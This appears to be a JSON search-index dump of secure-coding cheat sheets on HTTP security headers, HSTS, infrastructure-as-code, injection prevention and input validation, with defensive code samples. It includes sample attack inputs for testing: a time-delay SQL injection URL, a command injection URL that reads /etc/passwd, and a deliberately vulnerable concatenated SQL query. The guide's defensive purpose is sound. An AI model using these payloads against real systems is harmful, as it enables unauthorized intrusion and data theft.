"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#haproxy","title":"HAProxy","text":"

Add the line below to your front-end, listen, or backend configurations to send the X-Frame-Options header.

http-response set-header X-Frame-Options DENY\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#nginx","title":"Nginx","text":"

Below is a sample configuration that sets the X-Frame-Options header in Nginx.

add_header \"X-Frame-Options\" \"DENY\";\n
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#express","title":"Express","text":"

You can use helmet to set up HTTP headers in Express. The code below is a sample for adding the X-Frame-Options header.

const helmet = require('helmet');\nconst app = express();\n// Sets \"X-Frame-Options: SAMEORIGIN\"\napp.use(\nhelmet.frameguard({\naction: \"sameorigin\",\n})\n);\n
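
For Java servlet applications (not covered by the samples above), one common approach is a response filter that sets the header on every response; a minimal sketch using the javax.servlet API (filter mapping and class name are illustrative):

import javax.servlet.Filter;\nimport javax.servlet.FilterChain;\nimport javax.servlet.FilterConfig;\nimport javax.servlet.ServletException;\nimport javax.servlet.ServletRequest;\nimport javax.servlet.ServletResponse;\nimport javax.servlet.annotation.WebFilter;\nimport javax.servlet.http.HttpServletResponse;\nimport java.io.IOException;\n\n/**\n * Illustrative filter that adds the X-Frame-Options header to every response\n */\n@WebFilter(\"/*\")\npublic class SecurityHeadersFilter implements Filter {\n\n@Override\npublic void init(FilterConfig filterConfig) {\n//Not used\n}\n\n@Override\npublic void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)\nthrows IOException, ServletException {\n//Set the header before the response is committed\n((HttpServletResponse) response).setHeader(\"X-Frame-Options\", \"DENY\");\nchain.doFilter(request, response);\n}\n\n@Override\npublic void destroy() {\n//Not used\n}\n}\n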
"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#testing-proper-implementation-of-security-headers","title":"Testing Proper Implementation of Security Headers","text":""},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#mozilla-observatory","title":"Mozilla Observatory","text":"

The Mozilla Observatory is an online tool which helps you to check your website's header status.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#smartscanner","title":"SmartScanner","text":"

SmartScanner has a dedicated test profile for testing the security of HTTP headers. Online tools usually test only the homepage of the given address, but SmartScanner scans the whole website, so you can make sure all of your web pages have the right HTTP headers in place.

"},{"location":"cheatsheets/HTTP_Headers_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html","title":"HTTP Strict Transport Security Cheat Sheet","text":""},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

HTTP Strict Transport Security (also named HSTS) is an opt-in security enhancement that is specified by a web application through the use of a special response header. Once a supported browser receives this header, that browser will prevent any communications from being sent over HTTP to the specified domain and will instead send all communications over HTTPS. It also prevents HTTPS click-through prompts in browsers.

The specification was released and published at the end of 2012 as RFC 6797 (HTTP Strict Transport Security (HSTS)) by the IETF.

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#threats","title":"Threats","text":"

HSTS addresses the following threats:

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#examples","title":"Examples","text":"

Simple example, using a long (1 year = 31536000 seconds) max-age. This example is dangerous since it lacks includeSubDomains:

Strict-Transport-Security:\u00a0max-age=31536000

This example is useful if all present and future subdomains will be HTTPS. This is a more secure option but will block access to certain pages that can only be served over HTTP:

Strict-Transport-Security:\u00a0max-age=31536000;\u00a0includeSubDomains

This example is useful if all present and future subdomains will be HTTPS. In this example we set a very short max-age in case of mistakes during initial rollout:

Strict-Transport-Security:\u00a0max-age=86400;\u00a0includeSubDomains

Recommended:

Strict-Transport-Security:\u00a0max-age=31536000;\u00a0includeSubDomains;\u00a0preload

The preload flag indicates the site owner's consent to have their domain preloaded. The site owner still needs to then go and submit the domain to the list.

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#problems","title":"Problems","text":"

Site owners can use HSTS to identify users without cookies. This can lead to a significant privacy leak. Take a look here for more details.

Cookies can be manipulated from sub-domains, so omitting the includeSubDomains option permits a broad range of cookie-related attacks that HSTS would otherwise prevent by requiring a valid certificate for a subdomain. Ensuring that the secure flag is set on all cookies will also prevent some, but not all, of the same attacks.

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#browser-support","title":"Browser Support","text":"

As of September 2019 HSTS is supported by all modern browsers, with the only notable exception being Opera Mini.

"},{"location":"cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html","title":"Infrastructure as Code Security","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#infrastructure-as-code-security-cheatsheet","title":"Infrastructure as Code Security Cheatsheet","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Infrastructure as code (IaC), also known as software-defined infrastructure, allows infrastructure components to be configured and deployed faster and more consistently by defining them as code, and also enables repeatable deployments across environments.

"},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#security-best-practices","title":"Security best practices","text":"

Here are some of the security best practices for IaC that can be easily integrated into the Software Development Lifecycle:

"},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#develop-and-distribute","title":"Develop and Distribute","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#deploy","title":"Deploy","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#runtime","title":"Runtime","text":""},{"location":"cheatsheets/Infrastructure_as_Code_Security_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html","title":"Injection Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, simple, actionable guidance for preventing the entire category of Injection flaws in your applications. Injection attacks, especially SQL Injection, are unfortunately very common.

Application accessibility is a very important factor in the protection and prevention of injection flaws. Only a minority of all applications within a company/enterprise are developed in house, whereas most applications come from external sources. Open source applications give at least the opportunity to fix problems, but closed source applications need a different approach to injection flaws.

Injection flaws occur when an application sends untrusted data to an interpreter. Injection flaws are very prevalent, particularly in legacy code, often found in SQL queries, LDAP queries, XPath queries, OS commands, program arguments, etc. Injection flaws are easy to discover when examining code, but more difficult via testing. Scanners and fuzzers can help attackers find them.

Depending on accessibility, different actions must be taken in order to fix them. It is always best to fix the problem in the source code itself, or even to redesign some parts of the application. But if the source code is not available, or it is simply uneconomical to fix legacy software, only virtual patching makes sense.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#application-types","title":"Application Types","text":"

Three classes of applications can usually be seen within a company. These three types are used to identify the actions which need to take place in order to prevent/fix injection flaws.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#a1-new-application","title":"A1: New Application","text":"

A new web application in the design phase, or in early stage development.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#a2-productive-open-source-application","title":"A2: Productive Open Source Application","text":"

An already productive application, which can be easily adapted. A Model-View-Controller (MVC) type application is just one example of an easily accessible application architecture.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#a3-productive-closed-source-application","title":"A3: Productive Closed Source Application","text":"

A productive application which cannot be modified, or can only be modified with difficulty.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#forms-of-injection","title":"Forms of Injection","text":"

There are several forms of injection targeting different technologies including SQL queries, LDAP queries, XPath queries and OS commands.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#query-languages","title":"Query languages","text":"

The most famous form of injection is SQL Injection where an attacker can modify existing database queries. For more information see the SQL Injection Prevention Cheat Sheet.

LDAP, SOAP, XPath and REST based queries can also be susceptible to injection attacks, allowing for data retrieval or control bypass.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#sql-injection","title":"SQL Injection","text":"

An SQL injection attack consists of insertion or \"injection\" of either a partial or complete SQL query via the data input or transmitted from the client (browser) to the web application.

A successful SQL injection attack can read sensitive data from the database, modify database data (insert/update/delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file existing on the DBMS file system or write files into the file system, and, in some cases, issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.

SQL Injection attacks can be divided into the following three classes: inband (data is extracted through the same channel used to inject the SQL code), out-of-band (data is retrieved through a different channel, e.g. an email containing the query results), and inferential or blind (no data is actually transferred, but the tester can reconstruct the information by sending particular requests and observing the resulting behavior of the database server).

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#how-to-test-for-the-issue","title":"How to test for the issue","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#during-code-review","title":"During code review","text":"

Check whether any queries to the database are not done via prepared statements.

If dynamic statements are being built, check whether the data is sanitized before being used as part of the statement.
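
For illustration, this is the kind of dynamic statement a reviewer should flag: untrusted input concatenated directly into the SQL string (the table and parameter names mirror the safe example shown later):

// DANGEROUS example for reviewers: untrusted input concatenated into the query\nString custname = request.getParameter(\"customerName\");\nString query = \"SELECT account_balance FROM user_data WHERE user_name = '\" + custname + \"'\";\nStatement stmt = connection.createStatement();\nResultSet results = stmt.executeQuery(query);\n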

Auditors should always look for uses of sp_execute, execute or exec within SQL Server stored procedures. Similar audit guidelines are necessary for similar functions for other vendors.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#automated-exploitation","title":"Automated Exploitation","text":"

Most of the situations and techniques presented below can be performed in an automated way using some tools. In this article the tester can find information on how to perform automated auditing using SQLMap.

Equally, Static Code Analysis data flow rules can detect whether unsanitized user-controlled input can change the SQL query.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#stored-procedure-injection","title":"Stored Procedure Injection","text":"

When using dynamic SQL within a stored procedure, the application must properly sanitize the user input to eliminate the risk of code injection. If not sanitized, the user could enter malicious SQL that will be executed within the stored procedure.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#time-delay-exploitation-technique","title":"Time delay Exploitation technique","text":"

The time delay exploitation technique is very useful when the tester finds a Blind SQL Injection situation, in which nothing is known about the outcome of an operation. The technique consists of sending an injected query with a conditional: if the conditional is true, the tester can monitor the time taken for the server to respond. If there is a delay, the tester can assume the result of the conditional query is true. This exploitation technique can differ from DBMS to DBMS (check the DBMS-specific section).

http://www.example.com/product.php?id=10 AND IF(version() like '5%', sleep(10), 'false'))--\n

In this example the tester is checking whether the MySQL version is 5.x or not, making the server delay the answer by 10 seconds. The tester can increase the delay time and monitor the responses. The tester also doesn't need to wait for the response; sometimes they can set a very high value (e.g. 100) and cancel the request after some seconds.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#out-of-band-exploitation-technique","title":"Out of band Exploitation technique","text":"

This technique is very useful when the tester finds a Blind SQL Injection situation, in which nothing is known about the outcome of an operation. The technique consists of using DBMS functions to perform an out-of-band connection and deliver the results of the injected query as part of a request to the tester's server. Like the error-based techniques, each DBMS has its own functions; check the DBMS-specific section.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#remediation","title":"Remediation","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#defense-option-1-prepared-statements-with-parameterized-queries","title":"Defense Option 1: Prepared Statements (with Parameterized Queries)","text":"

Prepared statements ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker. In the safe example below, if an attacker were to enter the userID of tom' or '1'='1, the parameterized query would not be vulnerable and would instead look for a username which literally matched the entire string tom' or '1'='1.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#defense-option-2-stored-procedures","title":"Defense Option 2: Stored Procedures","text":"

The difference between prepared statements and stored procedures is that the SQL code for a stored procedure is defined and stored in the database itself, and then called from the application.

Both of these techniques have the same effectiveness in preventing SQL injection, so your organization should choose whichever approach makes the most sense for you. Stored procedures are not always safe from SQL injection. However, certain standard stored procedure programming constructs have the same effect as the use of parameterized queries when implemented safely, which is the norm for most stored procedure languages.

Note: 'Implemented safely' means the stored procedure does not include any unsafe dynamic SQL generation.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#defense-option-3-allow-list-input-validation","title":"Defense Option 3: Allow-List Input Validation","text":"

Various parts of SQL queries aren't legal locations for the use of bind variables, such as the names of tables or columns, and the sort order indicator (ASC or DESC). In such situations, input validation or query redesign is the most appropriate defense. For the names of tables or columns, ideally those values come from the code, and not from user parameters.

But if user parameter values are used to select different table names or column names, then the parameter values should be mapped to the legal/expected table or column names to make sure unvalidated user input doesn't end up in the query, as in the sketch below. Please note, this is a symptom of poor design and a full rewrite should be considered if time allows.
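
A minimal sketch of that mapping approach, assuming a hypothetical reportType parameter and report tables:

// Map the untrusted value to a known, legal table name; anything else is rejected\nString reportType = request.getParameter(\"reportType\");\nString tableName;\nif (\"sales\".equals(reportType)) {\ntableName = \"sales_report\";\n} else if (\"traffic\".equals(reportType)) {\ntableName = \"traffic_report\";\n} else {\nthrow new IllegalArgumentException(\"Unexpected report type\");\n}\n// Only the mapped, known-good name ever reaches the query; the year stays a bind variable\nString query = \"SELECT * FROM \" + tableName + \" WHERE year = ?\";\n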

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#defense-option-4-escaping-all-user-supplied-input","title":"Defense Option 4: Escaping All User-Supplied Input","text":"

This technique should only be used as a last resort, when none of the above are feasible. Input validation is probably a better choice as this methodology is frail compared to other defenses and we cannot guarantee it will prevent all SQL Injection in all situations.

This technique is to escape user input before putting it in a query. It's usually only recommended to retrofit legacy code when implementing input validation isn't cost effective.
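
As a rough sketch only (assuming a single-quoted string literal context in standard SQL, where a literal single quote is represented by doubling it):

// Last-resort escaping: double any single quotes before concatenation.\n// This is fragile and context/database specific - prefer parameterized queries.\nString escaped = custname.replace(\"'\", \"''\");\nString query = \"SELECT account_balance FROM user_data WHERE user_name = '\" + escaped + \"'\";\n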

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#example-code-java","title":"Example code - Java","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#safe-java-prepared-statement-example","title":"Safe Java Prepared Statement Example","text":"

The following code example uses a PreparedStatement, Java's implementation of a parameterized query, to execute the same database query.

// This should REALLY be validated too\nString custname = request.getParameter(\"customerName\");\n// Perform input validation to detect attacks\nString query = \"SELECT account_balance FROM user_data WHERE user_name = ?\";\nPreparedStatement pstmt = connection.prepareStatement(query);\npstmt.setString(1, custname);\nResultSet results = pstmt.executeQuery();\n

We have shown examples in Java, but practically all other languages, including Cold Fusion and Classic ASP, support parameterized query interfaces.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#safe-java-stored-procedure-example","title":"Safe Java Stored Procedure Example","text":"

The following code example uses a CallableStatement, Java's implementation of the stored procedure interface, to execute the same database query. The sp_getAccountBalance stored procedure would have to be predefined in the database and implement the same functionality as the query defined above.

// This should REALLY be validated\nString custname = request.getParameter(\"customerName\");\ntry {\nCallableStatement cs = connection.prepareCall(\"{call sp_getAccountBalance(?)}\");\ncs.setString(1, custname);\nResultSet results = cs.executeQuery();\n// Result set handling...\n} catch (SQLException se) {\n// Logging and error handling...\n}\n
"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#ldap-injection","title":"LDAP Injection","text":"

LDAP Injection is an attack used to exploit web based applications that construct LDAP statements based on user input. When an application fails to properly sanitize user input, it's possible to modify LDAP statements through techniques similar to\u00a0SQL Injection. LDAP injection attacks could result in the granting of permissions to unauthorized queries, and content modification inside the LDAP tree. For more information on LDAP Injection attacks, visit\u00a0LDAP injection.

LDAP injection\u00a0attacks are common due to two factors:

  1. The lack of safer, parameterized LDAP query interfaces
  2. The widespread use of LDAP to authenticate users to systems.
"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#how-to-test-for-the-issue_1","title":"How to test for the issue","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#during-code-review_1","title":"During code review","text":"

Check whether any queries to the LDAP directory escape special characters; see here.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#automated-exploitation_1","title":"Automated Exploitation","text":"

The scanner module of a tool like OWASP ZAP includes rules to detect LDAP injection issues.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#remediation_1","title":"Remediation","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#escape-all-variables-using-the-right-ldap-encoding-function","title":"Escape all variables using the right LDAP encoding function","text":"

The main way LDAP stores names is based on the DN (distinguished name). You can think of it like a unique identifier. DNs are sometimes used to access resources, much like a username.

A DN might look like this

cn=Richard Feynman, ou=Physics Department, dc=Caltech, dc=edu\n

or

uid=inewton, ou=Mathematics Department, dc=Cambridge, dc=com\n

There are certain characters that are considered special characters in a DN. The exhaustive list is the following: \\ # + < > , ; \" = and leading or trailing spaces

Each DN points to exactly one entry, which can be thought of somewhat like a row in an RDBMS. For each entry, there will be one or more attributes, which are analogous to RDBMS columns. If you are interested in searching through LDAP for users with certain attributes, you may do so with search filters. In a search filter, you can use standard boolean logic to get a list of users matching an arbitrary constraint. Search filters are written in Polish notation, also known as prefix notation.

Example:

(&(ou=Physics)(| (manager=cn=Freeman Dyson,ou=Physics,dc=Caltech,dc=edu)\n(manager=cn=Albert Einstein,ou=Physics,dc=Princeton,dc=edu) ))\n

When building LDAP queries in application code, you MUST escape any untrusted data that is added to any LDAP query. There are two forms of LDAP escaping. Encoding for LDAP Search and Encoding for LDAP DN (distinguished name). The proper escaping depends on whether you are sanitizing input for a search filter, or you are using a DN as a username-like credential for accessing some resource.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#example-code-java_1","title":"Example code - Java","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#safe-java-for-ldap-escaping-example","title":"Safe Java for LDAP escaping Example","text":"
public String escapeDN (String name) {\n//From RFC 2253 and the / character for JNDI\nfinal char[] META_CHARS = {'+', '\"', '<', '>', ';', '/'};\nString escapedStr = new String(name);\n//Backslash is both a Java and an LDAP escape character,\n//so escape it first\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\\\\\\\\\",\"\\\\\\\\\\\\\\\\\");\n//Positional characters - see RFC 2253\nescapedStr = escapedStr.replaceAll(\"\\^#\",\"\\\\\\\\\\\\\\\\#\");\nescapedStr = escapedStr.replaceAll(\"\\^ | $\",\"\\\\\\\\\\\\\\\\ \");\nfor (int i=0 ; i < META_CHARS.length ; i++) {\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\" +\nMETA_CHARS[i],\"\\\\\\\\\\\\\\\\\" + META_CHARS[i]);\n}\nreturn escapedStr;\n}\n

Note that the backslash character is both a Java String literal escape character and a regular expression escape character, hence the doubled escaping above.

public String escapeSearchFilter (String filter) {\n//From RFC 2254\nString escapedStr = new String(filter);\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\\\\\\\\\",\"\\\\\\\\\\\\\\\\5c\");\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\\*\",\"\\\\\\\\\\\\\\\\2a\");\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\(\",\"\\\\\\\\\\\\\\\\28\");\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\)\",\"\\\\\\\\\\\\\\\\29\");\nescapedStr = escapedStr.replaceAll(\"\\\\\\\\\" +\nCharacter.toString('\\\\u0000'), \"\\\\\\\\\\\\\\\\00\");\nreturn escapedStr;\n}\n
"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#xpath-injection","title":"XPath Injection","text":"

TODO

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#scripting-languages","title":"Scripting languages","text":"

All scripting languages used in web applications have a form of eval call which receives code at runtime and executes it. If code is crafted using unvalidated and unescaped user input, code injection can occur, which allows an attacker to subvert application logic and eventually gain local access.

Every time a scripting language is used, the actual implementation of the 'higher' scripting language is done using a 'lower' language like C. If the scripting language has a flaw in its data handling code, 'Null Byte Injection' attack vectors can be deployed to gain access to other areas in memory, resulting in a successful attack.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#operating-system-commands","title":"Operating System Commands","text":"

OS command injection is a technique in which an attacker supplies operating system commands through a web interface in order to execute them on the web server.

Any web interface that is not properly sanitized is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords. OS command injection is preventable when security is emphasized during the design and development of applications.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#how-to-test-for-the-issue_2","title":"How to test for the issue","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#during-code-review_2","title":"During code review","text":"

Check whether any command execution methods are called and whether unvalidated user input is taken as data for that command.

Outside of code review, appending a semicolon to the end of a URL query parameter, followed by an operating system command, will often execute the command. %3B is the URL-encoded form of a semicolon. This works because the ; is interpreted as a command separator.

Example: http://sensitive/something.php?dir=%3Bcat%20/etc/passwd

If the application responds with the output of the /etc/passwd file then you know the attack has been successful. Many web application scanners can be used to test for this attack as they inject variations of command injections and test the response.

Equally, Static Code Analysis tools check the data flow of untrusted user input into a web application and check whether the data is then passed to a dangerous method which executes the user input as a command.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#remediation_2","title":"Remediation","text":"

If calling a system command that incorporates user-supplied data is considered unavoidable, the following two layers of defense should be used within software in order to prevent attacks:

  1. Parameterization\u00a0- If available, use structured mechanisms that automatically enforce the separation between data and command. These mechanisms can help to provide the relevant quoting and encoding.
  2. Input validation\u00a0- the values for the command and its relevant arguments should both be validated. There are different degrees of validation for the actual command and its arguments:

For example, an argument could be restricted to a strict allow-list pattern such as:

^[a-z0-9]{3,10}$
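
A minimal sketch of applying such a pattern before invoking a command (the command and parameter names are hypothetical):

import java.io.IOException;\nimport java.util.regex.Pattern;\n\nprivate static final Pattern ARG_PATTERN = Pattern.compile(\"^[a-z0-9]{3,10}$\");\n\npublic Process runTrustedCmd(String userArg) throws IOException {\n// Reject anything that does not match the strict allow-list pattern\nif (userArg == null || !ARG_PATTERN.matcher(userArg).matches()) {\nthrow new IllegalArgumentException(\"Unexpected argument format\");\n}\n// The command and the validated argument are passed separately, never as one string\nProcessBuilder pb = new ProcessBuilder(\"TrustedCmd\", userArg);\nreturn pb.start();\n}\n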

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#example-code-java_2","title":"Example code - Java","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#incorrect-usage","title":"Incorrect Usage","text":"
ProcessBuilder b = new ProcessBuilder(\"C:\\\\DoStuff.exe -arg1 -arg2\");\n

In this example, the command and the arguments are passed together as one string, making it easy to manipulate that expression and inject malicious strings.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#correct-usage","title":"Correct Usage","text":"

Here is an example that starts a process with a modified working directory. The command and each of the arguments are passed separately. This makes it easy to validate each term and reduces the risk of inserting malicious strings.

ProcessBuilder pb = new ProcessBuilder(\"TrustedCmd\", \"TrustedArg1\", \"TrustedArg2\");\nMap<String, String> env = pb.environment();\npb.directory(new File(\"TrustedDir\"));\nProcess p = pb.start();\n
"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#network-protocols","title":"Network Protocols","text":"

Web applications often communicate with network daemons (like SMTP, IMAP, FTP) where user input becomes part of the communication stream. Here it is possible to inject command sequences to abuse an established session.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#injection-prevention-rules","title":"Injection Prevention Rules","text":""},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#rule-1-perform-proper-input-validation","title":"Rule #1 (Perform proper input validation)","text":"

Perform proper input validation. Positive or \"allow list\" input validation with appropriate canonicalization is also recommended, but is not a complete defense as many applications require special characters in their input.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#rule-2-use-a-safe-api","title":"Rule #2 (Use a safe API)","text":"

The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. Be careful of APIs, such as stored procedures, that are parameterized, but can still introduce injection under the hood.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#rule-3-contextually-escape-user-data","title":"Rule #3 (Contextually escape user data)","text":"

If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter.

"},{"location":"cheatsheets/Injection_Prevention_Cheat_Sheet.html#other-injection-cheatsheets","title":"Other Injection Cheatsheets","text":"

SQL Injection Prevention Cheat Sheet

OS Command Injection Defense Cheat Sheet

LDAP Injection Prevention Cheat Sheet

Injection Prevention Cheat Sheet in Java

"},{"location":"cheatsheets/Injection_Prevention_in_Java_Cheat_Sheet.html","title":"Injection Prevention Cheat Sheet in Java","text":"

This information has been moved to the dedicated Java Security CheatSheet

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html","title":"Input Validation Cheat Sheet","text":""},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, simple, actionable guidance for providing Input Validation security functionality in your applications.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#goals-of-input-validation","title":"Goals of Input Validation","text":"

Input validation is performed to ensure only properly formed data is entering the workflow in an information system, preventing malformed data from persisting in the database and triggering malfunction of various downstream components. Input validation should happen as early as possible in the data flow, preferably as soon as the data is received from the external party.

Data from all potentially untrusted sources should be subject to input validation, including not only Internet-facing web clients but also backend feeds over extranets, from suppliers, partners, vendors or regulators, each of which may be compromised on their own and start sending malformed data.

Input Validation should not be used as the primary method of preventing XSS, SQL Injection and other attacks which are covered in respective cheat sheets but can significantly contribute to reducing their impact if implemented properly.

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#input-validation-strategies","title":"Input validation strategies","text":"

Input validation should be applied at both the syntactic and semantic level.

Syntactic validation should enforce correct syntax of structured fields (e.g. SSN, date, currency symbol).

Semantic validation should enforce correctness of their values in the specific business context (e.g. start date is before end date, price is within expected range).

It is always recommended to prevent attacks as early as possible in the processing of the user's (attacker's) request. Input validation can be used to detect unauthorized input before it is processed by the application.
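
A minimal sketch contrasting the two levels, assuming hypothetical startDate and endDate request parameters in ISO-8601 (yyyy-MM-dd) format:

import java.time.LocalDate;\nimport java.time.format.DateTimeParseException;\n\n...\n\ntry {\n// Syntactic validation: both values must parse as ISO-8601 dates\nLocalDate start = LocalDate.parse(request.getParameter(\"startDate\"));\nLocalDate end = LocalDate.parse(request.getParameter(\"endDate\"));\n// Semantic validation: the start date must come before the end date\nif (!start.isBefore(end)) {\nthrow new IllegalArgumentException(\"Start date must be before end date\");\n}\n} catch (DateTimeParseException e) {\nthrow new IllegalArgumentException(\"Dates must use the yyyy-MM-dd format\");\n}\n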

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#implementing-input-validation","title":"Implementing input validation","text":"

Input validation can be implemented using any programming technique that allows effective enforcement of syntactic and semantic correctness, for example:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#allow-list-vs-block-list","title":"Allow list vs block list","text":"

It is a common mistake to use block list validation in order to try to detect possibly dangerous characters and patterns like the apostrophe ' character, the string 1=1, or the <script> tag, but this is a massively flawed approach as it is trivial for an attacker to bypass such filters.

Plus, such filters frequently prevent authorized input, like O'Brian, where the ' character is fully legitimate. For more information on XSS filter evasion please see this wiki page.

Allow list validation is appropriate for all input fields provided by the user. Allow list validation involves defining exactly what IS authorized, and by definition, everything else is not authorized.

If the input is well-structured data, like dates, social security numbers, zip codes, or email addresses, then the developer should be able to define a very strong validation pattern, usually based on regular expressions, for validating such input.

If the input field comes from a fixed set of options, like a drop down list or radio buttons, then the input needs to match exactly one of the values offered to the user in the first place.
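
For example, a value coming from a drop-down list can be checked against the exact set of options that were offered (a sketch with a hypothetical color parameter):

import java.util.Set;\n\nprivate static final Set<String> ALLOWED_COLORS = Set.of(\"red\", \"green\", \"blue\");\n\n...\n\nString color = request.getParameter(\"color\");\n// The submitted value must be exactly one of the options offered to the user\nif (color == null || !ALLOWED_COLORS.contains(color)) {\nthrow new IllegalArgumentException(\"Unexpected value\");\n}\n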

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#validating-free-form-unicode-text","title":"Validating free-form Unicode text","text":"

Free-form text, especially with Unicode characters, is perceived as difficult to validate due to a relatively large space of characters that need to be allowed.

It's also free-form text input that highlights the importance of proper context-aware output encoding and quite clearly demonstrates that input validation is not the primary safeguard against Cross-Site Scripting. If your users want to type an apostrophe ' or a less-than sign < in their comment field, they might have a perfectly legitimate reason for that, and the application's job is to properly handle it throughout the whole life cycle of the data.

The primary means of input validation for free-form text input should be:

References:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#regular-expressions","title":"Regular expressions","text":"

Developing regular expressions can be complicated, and is well beyond the scope of this cheat sheet.

There are lots of resources on the internet about how to write regular expressions, including this site and the OWASP Validation Regex Repository.

When designing regular expressions, be aware of RegEx Denial of Service (ReDoS) attacks. These attacks cause a program using a poorly designed regular expression to operate very slowly and utilize CPU resources for a very long time.

In summary, input validation should:

"},{"location":"cheatsheets/Input_Validation_Cheat_Sheet.html#allow-list-regular-expression-examples","title":"Allow List Regular Expression Examples","text":"

Validating a U.S. Zip Code (5 digits plus optional -4)

^\\d{5}(-\\d{4})?$\n

Validating U.S. State Selection From a Drop-Down Menu

